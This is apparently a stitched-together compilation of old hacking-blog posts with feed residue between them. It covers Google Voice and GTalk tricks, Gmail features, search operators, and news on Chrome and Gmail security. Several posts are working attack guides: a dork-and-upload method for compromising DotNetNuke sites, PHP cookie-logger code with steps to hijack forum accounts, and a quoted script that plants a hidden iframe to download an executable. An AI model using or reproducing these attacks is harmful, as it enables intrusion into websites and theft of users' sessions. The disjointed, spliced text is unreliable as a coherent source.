Today I will explain a new hacking technique known as DNN (DotNetNuke). I will show you how to hack a DNN website. Is it easy? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting. I will teach you how to find your target and how to enter into the target website and upload your files.

DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

Below are the easy steps to implement the attack:

• First use a google dork to find the appropriate target.

inurl:”/portals/0″ site:.com

• You can change com to your desired domain name like bd ph ae
• Now search your website on the google after searching you will get many websites choose any one of it.

• Its time to check the required vulnerability on the website just place this code after the web address.

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

• For example if you got www.victim.com
• Replace it www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
• If you will get this screen means this web is going to hack.

• Now choose the third option “A File On Your Site” And than paste this java code on your address bar.

javascript:__doPostBack(‘ctlURL$cmdUpload’,”)

• It will allow you to upload a files on this website you can upload text ~ swf ~ jpg ~ gif ~ pdf ~ Files.

• After uploading files you can find your file on this address www.victim.com/portals/0/yourfile.extension

here extension is txt jpg swf etc.

• In our case

www.victim.com/portals/0/b.txt

About The Author

Irfan Shakeel is an ethical hacker/penetration tester and he have found many bugs on the famous web server. He is the founder of Ethical Hacking Blog.

Most of you might have heard about Google Voice which provides great free VOIP service within USA. However, Google Voice is not free for people outside USA. When you try to visit Google Voice home page from anywhere but USA, it says that Google Voice is not available in your country. Today, we bring you a hack that will let you use Google Voice to send and receive free SMS anywhere in the world.

Requirements:

• A smart Phone (iPhone, Blackberry or other smart phones)
• Internet connection
• Two Google Voice Accounts

Steps

If you have a smart phone you can download the google voice application for it. If Google does not have an application for your device you can still use web version which you can access from your phone’s web browser.

You will need a Google voice Account . If you are outside USA you can use a proxy such as hidelinkonline to create Google Voice account. Remember that you will need one account for each person that you want to send (or receive) SMS to (from). Google Voice comes with a USA phone number that you have the option to choose from host of numbers.

Once you have the accounts set up you can login to your phone using this information. The good thing is that this application works on GPRS too. Moreover, you can use GPRS without the special data plan for iPhone.

After you have logged into your application successfully, you can send SMS to any number in USA and Canada. Since all your friends now have a Google Voice Number you can sms them and they can reply back on your Google voice number. Your friends or partners need not be within the same country. They can be anywhere in the world. This is totally free SMS service for you.

If you liked this post please subscribe to Mr. Dinesh Agarwal’s Voip weblog Free Calls Hub.

Have Multiple Google Accounts?
And want to login with both of them on Gtalk on single PC?

This is what I wanted to do as I’ve got two Google IDs, so I found out the way to run multiple GTalks simultaneously…

How to do it:

1. Create a shortcut to GTalk on your desktop (if you dont have currently).
2. Go to the properties of the shortcut. There in the target, you’ll see something like: “C:\Program Files\Google\Google Talk\googletalk.exe”
3. Add /nomutex to that target line. Then the line would be (Include the Quotes in the address) :
   

   “C:\Program Files\Google\Google Talk\googletalk.exe” /nomutex

4. “Apply” it and then click “Ok”.
5. Check out if it works, Enjoy Multi-GTalks!

Don’t forget to leave comments here if this works…[:)]

How this Works:

The mutex is short for mutual exclusion object. A mutex is a program object that allows multiple program threads to share the same resource, but not simultaneously.

So, in the hack above, we used nomutex (no-mutex) so to use the same resources simultaneously… ]]> http://www.hungry-hackers.com/2009/03/login-to-multiple-accounts-using-gtalk.html/feed 29 http://www.hungry-hackers.com/2008/11/recover-your-forgotten-passwords-for-free.html http://www.hungry-hackers.com/2008/11/recover-your-forgotten-passwords-for-free.html#comments Mon, 24 Nov 2008 08:06:02 +0000 Ashik http://www.hungry-hackers.com/?p=383 I have got many Comments and Emails Saying that they have Forgot the Password of some email Account and now they want to get it back. Here is the Solution  to all your Emails and Comments. Gmail Password Recovery is a Software by which you can get your lost Passwords back and this is True. I have personally tried and Tested it.

Gmail Password Recovery is a tool that will search your PC for encrypted Gmail passwords, extract them, decrypt and decode them and display them in a readable format. The following locations are known to store Gmail passwords:

• Google Talk
• Gmail Notifier
• Google Desktop
• Picasa
• Google Photos Screensaver
• Internet Explorer
• Mozilla Firefox

This Cracking tool will work provided the password you are trying to recover is saved on your local PC under the current login and you are able to login automatically without entering your password. In any case, if you are trying to recover the password you have long forgotten, download Gmail Password Recovery.
[eminimall]
Note: The Passwords Shown in the Image have been Changed so Please Don’t Try it. They are just for Demonstration

Download Link:

http://w18.easy-share.com/1702541173.html

What is a CookieLogger?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

Download it.

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

Download it.

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only. …

Here’s looking into Gmail’s new features and what they promise.

New Gadgets : This week, Google opened Gmail to further user modification by allowing users to integrate Google Gadgets in Gmail’s left-hand navigation bar. The company has provided two sample Gadgets — Google Docs and Calendar (modular mini applications). While one provides a simple way to see your Google Calendar agenda and get an alert when you in a meeting, the other shows recently opened Google Docs files and lets you search across all of your documents right from within Gmail. The Gadgets can be enabled through the Gmail Labs tab in the Settings menu. Google has also added a Gmail Labs option to `Add any gadget by URL,’ which allows users to add any Gadget, the way one can while using iGoogle.

Emoticons : Emoticons have been available on Google Chat for quite some time, but this month they made their appearance on Gmail Darren Lewis, Gmail engineer, said in a blog post, “Following the evolutionary path blazed by coloured labels, we present, in all their technicolor glory, emoticons in your mail.” Besides the common gestures like smiling or winking, the new emoticons will enable users to input images of hugs and kisses instead of `XOXO’ and pictures of drinks, cake or exclamation points to help them get their points across better. Google not only added emoticons to mail messages, but also added the number of emoticons available in Google Talk.

Gmail Mobile version 2.0 : Google has introduced Version 2.0 of Gmail for Mobile for J2ME-supported devices such as the Nokia N95, as well as BlackBerry phones. According to Derek Phillips, Software Engineer, Google mobile team, “the focus in the second iteration of the popular e-mail client was to produce a faster and more reliable experience for users.” It will also give users offline access to their mails. The offline access will let users read, edit and respond to any mail. The sending of replies (as well as downloading of new mails), however, takes place when connectivity resumes. Among the key additions, the new version lets users access multiple accounts. Those who have both a Gmail and Google Apps email account can easily switch between them quickly. Users will no longer have to use two different mobile apps to access personal and work emails.

There is a multiple email drafts feature where users can save multiple email drafts in their mobile phone, so that they can pick and choose what they would like to send later. Also, the new version packs powerful shortcut keys. However, Gmail Mobile version 2.0 lacks support for many phones, especially those running on Windows Mobile such as HTC handsets. However, Google said users can try installing it at their own discretion if they have a Java Virtual Machine installed.

Google Goggles : For late night party drunkers Google has come up with a free email service that will check if users are really sure of want they are sending in the late night Friday email. For this Google has come up with a simple method that will ask users to solve a few simple math problems after they click send to verify if the sender is in the right state of mind. By default, Mail Goggles is only active late night on the weekend. Gmail users can adjust their email settings to activate the Goggles feature and dictate the times it is active.

Canned Responses : These will allow Gmail users to save a reply they are writing as a `canned response’ and then quickly select one of these responses while replying to a future e-mail. Canned Response feature is ideal for those tired of copying and pasting the same reply every time someone emails with a common question. To use the feature, a user just needs to click ‘Settings’, then click the ‘Labs’ tab. In the drop down menu click ‘Canned Responses’, and save changes. To compose a canned response, compose a new email and type the message. When the message is composed, click the drop-down arrow next to Canned responses and select new canned response. Give it a title and save. Now your message will be available to you whenever you are composing a new message, replying to a message or forwarding a message.

Contact manager : Google has also made a few changes to the contact manger in Gmail. Says Benjamin Grol, Product Manager, Google Contacts, in a blog post, “Up to this point, if you emailed someone five times, we’d automatically move them into My Contacts. Now, we’ll no longer automatically add contacts to your My Contacts group. Instead, you can go to Suggested Contacts, select the contacts you’d like and move them into My Contacts. All of your contacts — whether they’re in My Contacts or Suggested Contacts — will continue to show in auto-complete as you’re composing messages.”

As a part of this change, Google has moved previously auto-added contacts back into Suggested Contacts. Only contacts that a user has edited, imported or added to a group will remain in My Contacts. This will provide users with a clean slate and, we hope, a better point for syncing contacts with mobile devices.

Advanced IMAP controls : IMAP controls let users further streamline their Gmail IMAP experience. Users can choose which labels to sync in IMAP. This is useful if one finds mail client choking on Gmail/All Mail folder. The IMAP protocol allows messages to be marked for deletion, a state where a message is still present in the folder but slated to be deleted the next time the folder is deleted. After enabling this, go to the Labels tab under Settings. Users will see a new ‘Show in IMAP’ checkbox next to each of their labels. Uncheck the box and the corresponding folder will disappear from IMAP.

There are some other options also for users who want to make Gmail’s IMAP work more like traditional IMAP providers: turn off auto-expunge or trash messages when they’re no longer visible through IMAP.

eCommerce Consulting team can help ensure a successful undertaking and useful results.

But most people don’t use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google’s index, it’s still a struggle to pare results to a manageable number.

But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google’s search options go beyond simple keywords, the Web, and even its own programmers. Let’s look at some of Google’s lesser-known options.

Syntax Search Tricks

Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at:

www.google.com/help/operators.html

Here are some advanced operators that can help narrow down your search results.

Intitle: at the beginning of a query word or phrase (intitle:”Three Blind Mice”) restricts your search results to just the titles of Web pages.

Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you’re searching for might commonly appear in URLs. If you’re looking for the term HTML, for example, and you don’t want to get results such as

www.mysite.com/index.html

You can also enter intext:html.

Link: lets you see which pages are linking to your Web page or to another page you’re interested in. For example, try typing in

link:http://www.hungry-hackers.com

Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:”Mark Twain”site:edu. Experiment with mixing various elements; you’ll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature

(www.google.com/help/features.html#calculator)

Lets you do both math and a variety of conversions from the search box. For extra fun, try the query “Answer to life the universe and everything.”

Let Google help you figure out whether you’ve got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try “thre blund mise”) and Google may suggest a proper spelling. This doesn’t always succeed; it works best when the word you’re searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you’re searching for “three blind mice,” underneath the search window will appear a statement such as Searched the web for “three blind mice.”) You’ll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Suppose you want to contact someone and don’t have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you’ll see it at the top of the search results along with a map link to the address. If you’d rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you’d rather use a search form for business phone listings, try Yellow Search

(www.buzztoolbox.com/google/yellowsearch.shtml).

Extended Googling

Google offers several services that give you a head start in focusing your search. Google Groups

(http://groups.google.com)

indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle
CODE
(http://froogle.google.com),

which indexes products from online stores, and Google Catalogs
CODE
(http://catalogs.google.com),

which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google’s tools and services at

www.google.com/options/index.html

You’re probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert

(www.googlealert.com)

monitors your search terms and e-mails you information about new additions to Google’s Web index. (Google Alert is not affiliated with Google; it uses Google’s Web services API to perform its searches.) If you’re more interested in news stories than general Web content, check out the beta version of Google News Alerts

(www.google.com/newsalerts).

This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs

(http://labs.google.com),

a place for experimental Google ideas and features (which may come and go, so what’s there at this writing might not be there when you decide to check it out). With Google Voice Search

(http://labs1.google.com/gvs.html),

you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don’t expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google’s search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you’ll need an API key, which is available free from
CODE
www.google.com/apis

Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You’ll be amazed at how many different ways Google can improve your Internet searching.

Online Extra: More Google Tips

Here are a few more clever ways to tweak your Google searches.

Search Within a Timeframe

Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic’s current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as

CODE

http://aa.usno.navy.mil/data/docs/JulianDate.html

excl.gif No Active Links, Read the Rules – Edit by Ninja excl.gif), but an easier way is to do a Google daterange: search by filling in a form at

www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml

If one special syntax element is good, two must be better, right? Sometimes. Though some operators can’t be mixed (you can’t use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.

More Google API Applications

Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query

(www.staggernation.com/gawsh/).

When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL

(www.staggernation.com/garbo/).

Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it’s not something you’d do every day, but if your cell phone does e-mail and doesn’t do Web browsing, this is a very handy address to know.

Less than a week after the release of Google (NSDQ:GOOG)’s new Web browser Chrome, security researchers detected a buffer overflow vulnerability that could enable remote attackers to completely take control of a user’s computer.

The detected buffer overflow vulnerability, deemed critical by security experts, is the result of a boundary error in the handling of the “Save As” function. If a user saves a Web page serving malicious content, the program could cause a stack-based overflow error, which could open the door for remote hackers to unleash malicious code on a user’s machine.

Remote attackers could then exploit the flaw by constructing a specially crafted Web page infused with malicious code. The attacker could then entice a victim to open and then save the infected page, which would subsequently download malicious code onto the victim’s computer and give the attacker complete access to the affected system.

Chrome’s latest buffer overflow vulnerability is one of about half a dozen errors detected in the newly released beta Web browser, about half of which allow for remote code execution, experts say. Another vulnerability, discovered shortly after the browser’s release Tuesday, included a carpetbombing glitch that stemmed from a fundamental flaw in the underlying user agent Safari 3.1.

However experts say that several Chrome beta version flaws are anticipated and will likely be worked out with the final version as the browser is subsequently tested.

“I think for a new product like Chrome, it doesn’t concern me much that they’re discovering the number of vulnerabilities and the details are getting out there. That’s the point of beta, especially open source beta,” said John Bambenek, handler for the SANS Internet Storm Center. “I think that the people who are really into getting exploits on a number of machines are not interested in messing with Chrome until (Google) gets some distribution out there.”

“If it’s not public information, the hackers don’t have it either,” he added.

And despite some errors that could lead to remote exploitation, experts say that because the browser is still in beta and not yet widely adopted, security threats for most users for the time being remains small.

“I don’t think the consumer impact is very large yet,” said Bambenek, “but that could change very quickly.”

Rishi Narang has been the first. A Denial Of Service simple as pie:

Just browse this page and place your mouse over this link (make sure you bookmark this page if you want to read on though):

CRASH ME

Just “evil:%” in the anchor text is capable of crashing all the Chrome tabs (despite all the tabs are separated processes).

Someone has also reported that by entering a very long bookmark may kill the browser. Length has not been given but it’s worth a try.

If your Chrome is still alive you may want to try entering

about@:

in the location bar.

Good thing is that the browser doesn’t need Administrator rights to run.

Matt Cutt from his blog has stated that the chapter 11 of Eula will be updated. Yes the chapter about you giving all the rights to Google:

a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.

I’m worried about the enthusiastic reviews I see online.
Google brand was enough to push an unfinished product up to make it 1% of the User-Agent’s used on its very first day.
The risk is high, fuzzers are still crunching…

Update:

Another Bug found.
< script > document.write(‘< iframe src=”http://www.example.com/hello.exe” frameborder=”0″ width=”0″ height=”0″ >’); < / script >

This script should (I haven’t tested it yet, will do it later) trigger a silent download on the client machine.

Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed the tool is planning to release it in two weeks.

When you log in to Gmail the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually hit the sign out button. When you hit sign out this cookie is cleared.

Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done. According to Google this behavior was chosen because of low-bandwidth users, as SLL connections are slower.

The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for an attacker sniffing traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. Once this happens the attacker can log in to the account without the need of a password. People checking their e-mail from public wireless hotspots are obviously more likely to get attacked than the ones using secure wired networks. Todd Mumford, from the SEO company called SEO Visions Inc, states “This can be a serious problem for Internet Marketers who travel often and use their wireless laptops and Gmal services often and do not always have access to a secure connection”

Perry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.”

If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.